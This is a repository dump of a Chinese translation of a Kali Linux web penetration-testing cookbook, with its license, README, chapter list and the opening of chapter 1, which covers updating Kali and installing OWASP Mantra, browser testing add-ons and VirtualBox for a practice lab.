├── .gitignore
├── LICENSE
├── README.md
├── SUMMARY.md
├── ch1.md
├── ch10.md
├── ch2.md
├── ch3.md
├── ch4.md
├── ch5.md
├── ch6.md
├── ch7.md
├── ch8.md
├── ch9.md
├── cover.jpg
├── img
    ├── .gitignore
    ├── 1-1-1.jpg
    ├── 1-1-2.jpg
    ├── 1-1-3.jpg
    ├── 1-2-1.jpg
    ├── 1-2-2.jpg
    ├── 1-2-3.jpg
    ├── 1-3-1.jpg
    ├── 1-3-2.jpg
    ├── 1-4-1.jpg
    ├── 1-4-2.jpg
    ├── 1-5-1.jpg
    ├── 1-5-2.jpg
    ├── 1-5-3.jpg
    ├── 1-6-1.jpg
    ├── 1-6-2.jpg
    ├── 1-6-3.jpg
    ├── 1-7-1.jpg
    ├── 1-7-2.jpg
    ├── 1-7-3.jpg
    ├── 1-7-4.jpg
    ├── 1-8-1.jpg
    ├── 1-8-2.jpg
    ├── 1-8-3.jpg
    ├── 1-8-4.jpg
    ├── 2-1-1.jpg
    ├── 2-1-2.jpg
    ├── 2-1-3.jpg
    ├── 2-10-1.jpg
    ├── 2-10-2.jpg
    ├── 2-10-3.jpg
    ├── 2-10-4.jpg
    ├── 2-10-5.jpg
    ├── 2-2-1.jpg
    ├── 2-2-2.jpg
    ├── 2-2-3.jpg
    ├── 2-2-4.jpg
    ├── 2-3-1.jpg
    ├── 2-4-1.jpg
    ├── 2-4-2.jpg
    ├── 2-4-3.jpg
    ├── 2-4-4.jpg
    ├── 2-5-1.jpg
    ├── 2-5-2.jpg
    ├── 2-6-1.jpg
    ├── 2-6-2.jpg
    ├── 2-6-3.jpg
    ├── 2-6-4.jpg
    ├── 2-7-1.jpg
    ├── 2-7-2.jpg
    ├── 2-7-3.jpg
    ├── 2-8-1.jpg
    ├── 2-9-1.jpg
    ├── 2-9-2.jpg
    ├── 3-1-1.jpg
    ├── 3-1-2.jpg
    ├── 3-2-1.jpg
    ├── 3-2-2.jpg
    ├── 3-3-1.jpg
    ├── 3-3-2.jpg
    ├── 3-3-3.jpg
    ├── 3-3-4.jpg
    ├── 3-4-1.jpg
    ├── 3-4-2.jpg
    ├── 3-4-3.jpg
    ├── 3-4-4.jpg
    ├── 3-4-5.jpg
    ├── 3-4-6.jpg
    ├── 3-4-7.jpg
    ├── 3-5-1.jpg
    ├── 3-5-2.jpg
    ├── 3-5-3.jpg
    ├── 3-5-4.jpg
    ├── 3-6-1.jpg
    ├── 3-6-2.jpg
    ├── 3-6-3.jpg
    ├── 3-6-4.jpg
    ├── 4-1-1.jpg
    ├── 4-1-2.jpg
    ├── 4-1-3.jpg
    ├── 4-1-4.jpg
    ├── 4-10-1.jpg
    ├── 4-10-2.jpg
    ├── 4-10-3.jpg
    ├── 4-11-1.jpg
    ├── 4-2-1.jpg
    ├── 4-2-2.jpg
    ├── 4-2-3.jpg
    ├── 4-3-1.jpg
    ├── 4-3-2.jpg
    ├── 4-3-3.jpg
    ├── 4-3-4.jpg
    ├── 4-3-5.jpg
    ├── 4-4-1.jpg
    ├── 4-4-2.jpg
    ├── 4-4-3.jpg
    ├── 4-4-4.jpg
    ├── 4-5-1.jpg
    ├── 4-5-2.jpg
    ├── 4-5-3.jpg
    ├── 4-5-4.jpg
    ├── 4-5-5.jpg
    ├── 4-6-1.jpg
    ├── 4-6-2.jpg
    ├── 4-6-3.jpg
    ├── 4-7-1.jpg
    ├── 4-7-2.jpg
    ├── 4-7-3.jpg
    ├── 4-8-1.jpg
    ├── 4-9-1.jpg
    ├── 4-9-2.jpg
    ├── 4-9-3.jpg
    ├── 5-1-1.jpg
    ├── 5-1-2.jpg
    ├── 5-2-1.jpg
    ├── 5-2-2.jpg
    ├── 5-2-3.jpg
    ├── 5-3-1.jpg
    ├── 5-3-2.jpg
    ├── 5-3-3.jpg
    ├── 5-3-4.jpg
    ├── 5-3-5.jpg
    ├── 5-4-1.jpg
    ├── 5-4-2.jpg
    ├── 5-4-3.jpg
    ├── 5-4-4.jpg
    ├── 5-4-5.jpg
    ├── 5-5-1.jpg
    ├── 5-5-2.jpg
    ├── 5-5-3.jpg
    ├── 5-5-4.jpg
    ├── 5-6-1.jpg
    ├── 5-6-2.jpg
    ├── 5-6-3.jpg
    ├── 6-1-1.jpg
    ├── 6-1-2.jpg
    ├── 6-1-3.jpg
    ├── 6-1-4.jpg
    ├── 6-1-5.jpg
    ├── 6-10-1.jpg
    ├── 6-10-2.jpg
    ├── 6-10-3.jpg
    ├── 6-10-4.jpg
    ├── 6-10-5.jpg
    ├── 6-10-6.jpg
    ├── 6-2-1.jpg
    ├── 6-2-2.jpg
    ├── 6-2-3.jpg
    ├── 6-2-4.jpg
    ├── 6-2-5.jpg
    ├── 6-3-1.jpg
    ├── 6-3-2.jpg
    ├── 6-3-3.jpg
    ├── 6-3-4.jpg
    ├── 6-4-1.jpg
    ├── 6-4-2.jpg
    ├── 6-4-3.jpg
    ├── 6-5-1.jpg
    ├── 6-5-2.jpg
    ├── 6-5-3.jpg
    ├── 6-5-4.jpg
    ├── 6-5-5.jpg
    ├── 6-5-6.jpg
    ├── 6-6-1.jpg
    ├── 6-6-2.jpg
    ├── 6-6-3.jpg
    ├── 6-6-4.jpg
    ├── 6-6-5.jpg
    ├── 6-7-1.jpg
    ├── 6-7-2.jpg
    ├── 6-7-3.jpg
    ├── 6-7-4.jpg
    ├── 6-7-5.jpg
    ├── 6-7-6.jpg
    ├── 6-8-1.jpg
    ├── 6-8-2.jpg
    ├── 6-8-3.jpg
    ├── 6-8-4.jpg
    ├── 6-9-1.jpg
    ├── 6-9-2.jpg
    ├── 6-9-3.jpg
    ├── 7-1-1.jpg
    ├── 7-1-2.jpg
    ├── 7-1-3.jpg
    ├── 7-2-1.jpg
    ├── 7-2-2.jpg
    ├── 7-2-3.jpg
    ├── 7-2-4.jpg
    ├── 7-2-5.jpg
    ├── 7-3-1.jpg
    ├── 7-3-2.jpg
    ├── 7-3-3.jpg
    ├── 7-3-4.jpg
    ├── 7-3-5.jpg
    ├── 7-3-6.jpg
    ├── 7-4-1.jpg
    ├── 7-4-10.jpg
    ├── 7-4-11.jpg
    ├── 7-4-12.jpg
    ├── 7-4-13.jpg
    ├── 7-4-14.jpg
    ├── 7-4-15.jpg
    ├── 7-4-2.jpg
    ├── 7-4-3.jpg
    ├── 7-4-4.jpg
    ├── 7-4-5.jpg
    ├── 7-4-6.jpg
    ├── 7-4-7.jpg
    ├── 7-4-8.jpg
    ├── 7-4-9.jpg
    ├── 7-5-1.jpg
    ├── 7-5-2.jpg
    ├── 7-5-3.jpg
    ├── 7-5-4.jpg
    ├── 7-6-1.jpg
    ├── 7-6-2.jpg
    ├── 7-6-3.jpg
    ├── 7-6-4.jpg
    ├── 7-6-5.jpg
    ├── 7-6-6.jpg
    ├── 7-6-7.jpg
    ├── 7-7-1.jpg
    ├── 7-7-2.jpg
    ├── 7-7-3.jpg
    ├── 7-7-4.jpg
    ├── 7-7-5.jpg
    ├── 7-7-6.jpg
    ├── 7-7-7.jpg
    ├── 7-7-8.jpg
    ├── 7-8-1.jpg
    ├── 7-8-2.jpg
    ├── 7-8-3.jpg
    ├── 7-9-1.jpg
    ├── 7-9-2.jpg
    ├── 7-9-3.jpg
    ├── 8-0-1.jpg
    ├── 8-1-1.jpg
    ├── 8-1-2.jpg
    ├── 8-1-3.jpg
    ├── 8-1-4.jpg
    ├── 8-2-1.jpg
    ├── 8-2-2.jpg
    ├── 8-2-3.jpg
    ├── 8-2-4.jpg
    ├── 8-3-1.jpg
    ├── 8-3-2.jpg
    ├── 8-3-3.jpg
    ├── 8-3-4.jpg
    ├── 8-4-1.jpg
    ├── 8-5-1.jpg
    ├── 8-5-2.jpg
    ├── 8-5-3.jpg
    ├── 8-6-1.jpg
    ├── 8-6-2.jpg
    ├── 8-6-3.jpg
    ├── 9-1-1.jpg
    ├── 9-1-2.jpg
    ├── 9-1-3.jpg
    ├── 9-1-4.jpg
    ├── 9-2-1.jpg
    ├── 9-2-2.jpg
    ├── 9-3-1.jpg
    ├── 9-3-2.jpg
    ├── 9-3-3.jpg
    ├── 9-3-4.jpg
    ├── 9-4-1.jpg
    ├── 9-4-2.jpg
    ├── 9-4-3.jpg
    ├── 9-5-1.jpg
    ├── 9-5-2.jpg
    ├── 9-5-3.jpg
    ├── 9-5-4.jpg
    └── qr_alipay.png
└── styles
    └── ebook.css


/.gitignore:
--------------------------------------------------------------------------------
1 | _book
2 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License (CC BY-NC-SA 4.0)
  2 | 
  3 | Copyright © 2020 ApacheCN(apachecn@163.com)
  4 | 
  5 | By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
  6 | 
  7 | Section 1 – Definitions.
  8 | 
  9 | a.  Adapted Material means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
 10 | b.  Adapter's License means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License.
 11 | c.  BY-NC-SA Compatible License means a license listed at creativecommons.org/compatiblelicenses, approved by Creative Commons as essentially the equivalent of this Public License.
 12 | d.  Copyright and Similar Rights means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.
 13 | e.  Effective Technological Measures means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements.
 14 | f.  Exceptions and Limitations means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material.
 15 | g.  License Elements means the license attributes listed in the name of a Creative Commons Public License. The License Elements of this Public License are Attribution, NonCommercial, and ShareAlike.
 16 | h.  Licensed Material means the artistic or literary work, database, or other material to which the Licensor applied this Public License.
 17 | i.  Licensed Rights means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license.
 18 | j.  Licensor means the individual(s) or entity(ies) granting rights under this Public License.
 19 | k.  NonCommercial means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange.
 20 | l.  Share means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them.
 21 | m.  Sui Generis Database Rights means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
 22 | n.  You means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
 23 | 
 24 | Section 2 – Scope.
 25 | 
 26 | a.  License grant.
 27 |     1.  Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:
 28 |         A.  reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and
 29 |         B.  produce, reproduce, and Share Adapted Material for NonCommercial purposes only.
 30 |     2.  Exceptions and Limitations. For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions.
 31 |     3.  Term. The term of this Public License is specified in Section 6(a).
 32 |     4.  Media and formats; technical modifications allowed. The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material.
 33 |     5.  Downstream recipients.
 34 |         A.  Offer from the Licensor – Licensed Material. Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.
 35 |         B.  Additional offer from the Licensor – Adapted Material. Every recipient of Adapted Material from You automatically receives an offer from the Licensor to exercise the Licensed Rights in the Adapted Material under the conditions of the Adapter’s License You apply.
 36 |         C.  No downstream restrictions. You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material.
 37 |     6.  No endorsement. Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).
 38 | b.  Other rights.
 39 |     1.  Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.
 40 |     2.  Patent and trademark rights are not licensed under this Public License.
 41 |     3.  To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
 42 | 
 43 | Section 3 – License Conditions.
 44 | 
 45 | Your exercise of the Licensed Rights is expressly made subject to the following conditions.
 46 | 
 47 | a.  Attribution.
 48 |     1.  If You Share the Licensed Material (including in modified form), You must:
 49 |         A.  retain the following if it is supplied by the Licensor with the Licensed Material:
 50 |             i.  identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated);
 51 |            ii.  a copyright notice;
 52 |           iii.  a notice that refers to this Public License;
 53 |            iv.  a notice that refers to the disclaimer of warranties;
 54 |             v.  a URI or hyperlink to the Licensed Material to the extent reasonably practicable;
 55 |         B.  indicate if You modified the Licensed Material and retain an indication of any previous modifications; and
 56 |         C.  indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License.
 57 |     2.  You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information.
 58 |     3.  If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable.
 59 | b.  ShareAlike.
 60 |     In addition to the conditions in Section 3(a), if You Share Adapted Material You produce, the following conditions also apply.
 61 |     1.  The Adapter’s License You apply must be a Creative Commons license with the same License Elements, this version or later, or a BY-NC-SA Compatible License.
 62 |     2.  You must include the text of, or the URI or hyperlink to, the Adapter's License You apply. You may satisfy this condition in any reasonable manner based on the medium, means, and context in which You Share Adapted Material.
 63 |     3.  You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, Adapted Material that restrict exercise of the rights granted under the Adapter's License You apply.
 64 | 
 65 | Section 4 – Sui Generis Database Rights.
 66 | 
 67 | Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
 68 | 
 69 | a.  for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only;
 70 | b.  if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material, including for purposes of Section 3(b); and
 71 | c.  You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database.
 72 | 
 73 | For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
 74 | 
 75 | Section 5 – Disclaimer of Warranties and Limitation of Liability.
 76 | 
 77 | a.  Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.
 78 | b.  To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.
 79 | c.  The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
 80 | 
 81 | Section 6 – Term and Termination.
 82 | 
 83 | a.  This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
 84 | b.  Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:
 85 |     1.  automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
 86 |     2.  upon express reinstatement by the Licensor.
 87 |     For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License.
 88 | c.  For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License.
 89 | d.  Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
 90 | 
 91 | Section 7 – Other Terms and Conditions.
 92 | 
 93 | a.  The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
 94 | b.  Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
 95 | 
 96 | Section 8 – Interpretation.
 97 | 
 98 | a.  For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
 99 | b.  To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions.
100 | c.  No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor.
101 | d.  Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Kali Linux Web 渗透测试秘籍 中文版
 2 | 
 3 | > 原书：[Kali Linux Web Penetration Testing Cookbook](https://www.packtpub.com/networking-and-servers/kali-linux-web-penetration-testing-cookbook)
 4 | > 
 5 | > 译者：[飞龙](https://github.com/wizardforcel)
 6 | > 
 7 | > 第二版请见[ Kali Linux Web 渗透测试手册（第二版）](https://github.com/xuanhun/HackingResource#kali-linux-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%89%8B%E5%86%8C%E7%AC%AC2%E7%89%88)
 8 | 
 9 | + [在线阅读](https://www.gitbook.com/book/wizardforcel/kali-linux-web-pentest-cookbook/details)
10 | + [PDF格式](https://www.gitbook.com/download/pdf/book/wizardforcel/kali-linux-web-pentest-cookbook)
11 | + [EPUB格式](https://www.gitbook.com/download/epub/book/wizardforcel/kali-linux-web-pentest-cookbook)
12 | + [MOBI格式](https://www.gitbook.com/download/mobi/book/wizardforcel/kali-linux-web-pentest-cookbook)
13 | + [Github](https://github.com/wizardforcel/kali-linux-web-pentest-cookbook-zh)
14 | + [Git@OSC](http://git.oschina.net/wizardforcel/kali-linux-web-pentest-cookbook-zh)
15 | 
16 | ## 赞助我
17 | 
18 | ![](img/qr_alipay.png)
19 | 
20 | ## 协议
21 | 
22 | [CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
23 | 


--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
 1 | + [Kali Linux Web 渗透测试秘籍 中文版](README.md)
 2 | + [第一章 配置 Kali Linux](ch1.md)
 3 | + [第二章 侦查](ch2.md)
 4 | + [第三章 爬虫和蜘蛛](ch3.md)
 5 | + [第四章 漏洞发现](ch4.md)
 6 | + [第五章 自动化扫描](ch5.md)
 7 | + [第六章 利用 -- 低悬的果实](ch6.md)
 8 | + [第七章 高级利用](ch7.md)
 9 | + [第八章 中间人攻击](ch8.md)
10 | + [第九章 客户端攻击和社会工程](ch9.md)
11 | + [第十章 OWASP Top 10 的预防](ch10.md)


--------------------------------------------------------------------------------
/ch1.md:
--------------------------------------------------------------------------------
  1 | # 第一章 配置 Kali Linux
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 在第一章中，我们会涉及如何准备我们的 Kali 以便能够遵循这本书中的秘籍，并使用虚拟机建立带有存在漏洞的 Web 应用的实验室。
 12 | 
 13 | ## 1.1 升级和更新 Kali 
 14 | 
 15 | 在我们开始 Web 应用安全测试之前，我们需要确保我们拥有所有必要的最新工具。这个秘籍涉及到使 Kali 和它的工具保持最新版本的基本步骤。
 16 | 
 17 | ### 准备
 18 | 
 19 | 我们从 Kali 已经作为主操作系统安装到计算机上，并带有网络连接来开始。这本书中所使用的版本为 2.0。你可以从 <https://www.kali.org/downloads/> 下载 live CD 和安装工具。
 20 | 
 21 | ### 操作步骤
 22 | 
 23 | 一旦你的 Kali 实例能够启动和运行，执行下列步骤：
 24 | 
 25 | 1.  以 root 登录 Kali。默认密码是 toor，不带双引号。你也可以使用`su`来切换到该用户，或者如果喜欢使用普通用户而不是 root 的话，用`sudo`来执行单条命令。
 26 | 
 27 | 2.  打开终端。
 28 | 
 29 | 3.  运行`apt-get update`命令。这会下载可用于安装的包（应用和工具）的更新列表。
 30 | 
 31 |     ```
 32 |     apt-get update
 33 |     ```
 34 |     
 35 |     ![](img/1-1-1.jpg)
 36 |     
 37 | 4.  一旦安装完成，执行下列命令来将非系统的包更新到最新的稳定版。
 38 | 
 39 |     ```
 40 |     apt-get upgrade
 41 |     ```
 42 |     
 43 |     ![](img/1-1-2.jpg)
 44 |     
 45 | 5.  当被询问是否继续时，按下`Y`并按下回车。
 46 | 
 47 | 6.  下面，让我们升级我们的系统。键入下列命令并按下回车：
 48 | 
 49 |     ```
 50 |     apt-get dist-upgrade
 51 |     ```
 52 |     
 53 |     ![](img/1-1-3.jpg)
 54 |     
 55 | 7.  现在，我们更新了 Kali 并准备好了继续。
 56 | 
 57 | ### 工作原理
 58 | 
 59 | 这个秘籍中，我们涉及到了更新基于 Debian 的系统（比如 Kali）的基本步骤。首先以`update`参数调用`apt-get`来下载在所配置的仓库中，用于我们的特定系统的包的最新列表。下载和安装仓库中最新版本的所有包之后，`dist-update`参数下载和安装`upgrade`没有安装的系统包（例如内核和内核模块）。
 60 | 
 61 | > 这本书中，我们假设 Kali 已经作为主操作系统在电脑上安装。也可以将它安装在虚拟机中。这种情况下，要跳过秘籍“安装 VirtualBox”，并按照“为正常通信配置虚拟机”配置 Kali VM 的网络选项。
 62 | 
 63 | ### 更多
 64 | 
 65 | 有一些工具，例如 Metasploit 框架，拥有自己的更新命令。可以在这个秘籍之后执行它们。命令在下面：
 66 | 
 67 | ```
 68 | msfupdate 
 69 | ```
 70 | 
 71 | ## 1.2 安装和运行 OWASP Mantra
 72 | 
 73 | OWASP（开放 Web 应用安全项目，<https://www.owasp.org/>）中的研究员已经将 Mozilla FIrefox 与 大量的插件集成，这些插件用于帮助渗透测试者和开发者测试 Web 应用的 bug 或安全缺陷。这个秘籍中，我们会在 Kali 上安装 OWASP Mantra（<http://www.getmantra.com/>），首次运行它，并查看一些特性。
 74 | 
 75 | 大多数 Web 应用渗透测试都通过浏览器来完成。这就是我们为什么需要一个带有一组工具的浏览器来执行这样一个任务。OWASP Mantra 包含一系列插件来执行任务，例如：
 76 | 
 77 | +   嗅探和拦截 HTTP 请求
 78 | 
 79 | +   调试客户端代码
 80 | 
 81 | +   查看和修改 Cookie
 82 | 
 83 | +   收集关于站点和应用的信息
 84 | 
 85 | ### 准备
 86 | 
 87 | 幸运的是， OWASP Mantra 默认包含于 Kali 的仓库中。所以，要确保我们获得了浏览器的最新版本，我们需要更新包列表：
 88 | 
 89 | ```
 90 | apt-get update
 91 | ```
 92 | 
 93 | ### 操作步骤
 94 | 
 95 | 1.  打开终端并执行：
 96 | 
 97 |     ```
 98 |     apt-get install owasp-mantra-ff
 99 |     ```
100 |     
101 |     ![](img/1-2-1.jpg)
102 |     
103 | 2.  在安装完成之后，访问菜单：` Applications | 03 - Web Application Analysis | Web Vulnerability Scanners | owasp-mantra-ff`来首次启动 Mantra。或者在终端中输入下列命令：
104 | 
105 |     ```
106 |     owasp-mantra-ff
107 |     ```
108 |     
109 |     ![](img/1-2-2.jpg)
110 |     
111 | 3.  在新打开的浏览器中，点击 OWASP 图标之后点击`Tools`。这里我们可以访问到所有 OWASP Mantra 包含的工具。
112 | 
113 |     ![](img/1-2-3.jpg)
114 |     
115 | 4.  我们会在之后的章节中使用这些工具。
116 | 
117 | ### 另见
118 | 
119 | 你可能也对 Mantra on Chromium （MOC）感兴趣，这是 Mantra 的一个替代版本，基于 Chromium 浏览器。当前，它只对 Windows 可用：<http://www.getmantra.com/mantra-on-chromium.html>。
120 | 
121 | ## 1.3 配置 Iceweasel 浏览器
122 | 
123 | 如果我们不喜欢 OWASP Mantra，我们可以使用 Firefox 的最新版本，并安装我们自己的测试相关插件。Kali Linux 包含了 Iceweasel，另一个 Firefox 的变体。我们这里会使用它来看看如何在它上面安装我们的测试工具。
124 | 
125 | ### 操作步骤
126 | 
127 | 1.  打开 Iceweasel 并访问`Tools | Add-ons`。就像下面的截图这样：
128 | 
129 |     ![](img/1-3-1.jpg)
130 |     
131 | 2.  在搜素框中，输入`tamper data `并按下回车。
132 | 
133 |     ![](img/1-3-2.jpg)
134 |     
135 | 3.  在`Tamper Data `插件中点击`Install`。
136 | 
137 | 4.  对话框会弹出，询问我们接受 EULA，点击`Accept and Install...`。
138 | 
139 |     > 你可能需要重启你的浏览器来完成特定插件的安装。
140 | 
141 | 5.  下面，我们在搜索框中搜索`cookies manager+ `。
142 | 
143 | 6.  在`cookies manager+ `插件中点击`Install`。
144 | 
145 | 7.  现在，搜索`Firebug`。
146 | 
147 | 8.  搜索和安装`Hackbar`。
148 | 
149 | 9.  搜索和安装` HTTP Requester`。
150 | 
151 | 0.  搜索和安装`Passive Recon`。
152 | 
153 | ### 工作原理
154 | 
155 | 目前为止，我们在 Web 浏览器中安装了一些工具，但是对 Web 应用渗透测试者来说，这些工具好在哪里呢？
156 | 
157 | +   `Cookies Manager+`：这个插件允许我们查看，并有时候修改浏览器从应用受到的 Cookie 的值。
158 | 
159 | +   `Firebug`：这是任何 Web 开发者的必需品。它的主要功能是网页的内嵌调试器。它也在你对页面执行一些客户端修改时非常有用。
160 | 
161 | +   `Hackbar`：这是一个非常简单的插件，帮助我们尝试不同的输入值，而不需要修改或重写完整的 URL。在手动检查跨站脚本工具和执行注入的时候，我们会很频繁地使用它。
162 | 
163 | +   `Http Requester`：使用这个工具，我们就能构造 HTTP 链接，包括 GET、POST 和 PUT 方法，并观察来自服务器的原始响应。
164 | 
165 | +   `Passive Recon`：它允许我们获得关于网站被访问的公共信息，通过查询 DNS 记录、WHOIS、以及搜索信息，例如邮件地址、链接和 Google 中的合作者。
166 | 
167 | +   `Tamper Data`：这个插件能够在请求由浏览器发送之后，捕获任何到达服务器的请求。这提供给我们了在将数据引入应用表单之后，在它到达服务器之前修改它的机会。
168 | 
169 | ### 更多
170 | 
171 | 有一些插件同样对 Web 应用渗透测试者有用，它们是：
172 | 
173 | + XSS Me 
174 | + SQL Inject Me 
175 | + FoxyProxy 
176 | + iMacros 
177 | + FirePHP 
178 | + RESTClient 
179 | + Wappalyzer
180 | 
181 | ## 1.4 安装 VirtualBox
182 | 
183 | 这是我们的第四篇秘籍，会帮助我们建立虚拟机环境，并运行它来实施我们的渗透测试。我们会使用 VirtualBox 在这样的环境中运行主机。这个秘籍中，我们会了解如何安装 VirtualBox 以及使它正常工作。
184 | 
185 | ### 准备
186 | 
187 | 在我们在 Kali 中安装任何东西之前，我们都必须确保我们拥有最新版本的包列表：
188 | 
189 | ```
190 | apt-get update
191 | ```
192 | 
193 | ### 操作步骤
194 | 
195 | 1.  我们首先实际安装 VirtualBox：
196 | 
197 |     ```
198 |     apt-get install virtualbox
199 |     ```
200 |     
201 |     ![](img/1-4-1.jpg)
202 |     
203 | 2.  安装完成之后，我们要在菜单中寻找 VirtualBox，通过访问`Applications | Usual applications | Accessories | VirtualBox`。作为替代，我们也可以从终端调用它：
204 | 
205 |     ```
206 |     virtualbox
207 |     ```
208 |     
209 |     ![](img/1-4-2.jpg)
210 |     
211 | 现在，我们运行了 VirtualBox 并且已经准备好配置虚拟机来构建我们自己的测试环境。
212 | 
213 | ### 工作原理
214 | 
